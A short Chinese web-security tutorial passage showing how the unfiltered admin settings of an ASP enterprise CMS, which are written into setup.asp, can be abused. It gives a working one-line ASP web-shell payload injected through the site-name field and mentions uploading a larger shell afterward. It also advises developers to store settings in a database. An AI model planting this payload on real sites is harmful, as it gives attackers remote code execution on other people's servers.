(3 ) 程序参数允许写入文件
在对“蓝木企业管理系统”进行分析的时候发现现在有很多程序在后台允许设置的参数是允许写入文件的。这个做的问题就是允许我们构造特殊的语句,将一个参数保存文件改造为一个木马,当提交的表单对文本域的长度进行限制的时候我们可以构造一个一句话木马,没有过滤的话,我们就可以直接写入一个大马了。所以建议程序员养成良好的习惯,将参数数据都保存到数据库中,不要保存到文件里,避免类似情况的发生。下面我们以蓝木企业管理系统为例,进行演示:
这里的所有参数都是写入到setup.asp这个文件里的。
因为他并没有对写入的参数进行任何的过滤,所以我们可以手工写入参数,对语句进行提前结束,然后得到一个一句话后门。我们这里修改网站名称好了,改为:测试"%><%execute request("value")%><%a="1,发现修改后的配置文件内容变为:
访问setup.asp返回
证明构造一句话木马成功,接下来就是上传大马,这里就不详细演示了。
